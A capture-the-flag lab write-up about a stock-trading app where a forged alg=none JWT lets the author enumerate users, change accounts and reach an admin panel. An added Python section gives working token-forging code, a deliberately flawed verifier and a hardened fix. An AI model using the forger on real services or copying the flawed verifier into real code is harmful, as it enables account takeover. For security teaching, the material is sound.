Shady Oaks
We're back to selling and buying stock, equipped with the hint JWT.
This was a pretty straightforward lab. On the endpoint /api/verify I could easily enumerate all the users, simply by modifying the ID in the JWT and signing it with the none algorithm.
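The trick above is the classic alg=none attack: the token is re-issued with the header's alg set to "none" and an empty signature, and a verifier that trusts the token's own alg field accepts the forged claims. The following is an added Python example, not the lab's code. The secret, the claim name "id" and the claim values are constructed for the example; the lab's real claim names and endpoint behaviour are not known beyond what the writeup says.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret standing in for whatever key the lab's server really uses.
SECRET = b"example-server-secret"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding that JWT encoding strips, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> tuple[dict, dict, str]:
    """Split a compact JWT into (header, payload, signature_b64) without verifying it."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        signature_b64,
    )


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Issue a legitimately HS256-signed token (used here to build the 'hint' JWT)."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none_jwt(token: str, **claim_overrides) -> str:
    """Take an existing token, rewrite claims, set alg=none and drop the signature."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = "none"
    payload.update(claim_overrides)
    return (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
        + "."  # empty signature segment
    )


def verify_vulnerable(token: str, secret: bytes) -> dict:
    """Verifier that trusts the token's own alg field: alg=none is accepted unsigned."""
    header, payload, sig = decode_jwt(token)
    if header.get("alg") == "none":
        return payload  # BUG: attacker-controlled header decides that no signature is needed
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        raise ValueError("bad signature")
    return payload


def verify_hardened(token: str, secret: bytes) -> dict:
    """Verifier that pins the expected algorithm before looking at anything else."""
    header, payload, sig = decode_jwt(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        raise ValueError("bad signature")
    return payload


def is_rejected(verifier, token: str, secret: bytes) -> bool:
    """True if the verifier raises on the token."""
    try:
        verifier(token, secret)
    except ValueError:
        return True
    return False


# Constructed 'hint' token for a low-privilege user; the claim names are assumptions.
HINT_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"id": 1337, "email": "user@example.com"}, SECRET)
```

Changing the id claim in a loop over forge_none_jwt(HINT_TOKEN, id=n) is exactly the enumeration described above; the hardened verifier shows the fix, which is to decide the algorithm server-side rather than reading it from the token.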

I could do all kinds of things with this token: change the email, change the full name, buy or sell stock. I could do everything, except find the actual bug 🪲. Then I tried putting the JWT inside my localStorage.

This did the trick. I hit refresh and became admin. The admin panel gave away its secrets like a kid spilling dark family secrets for some candy, and I had one more flag 🇧🇪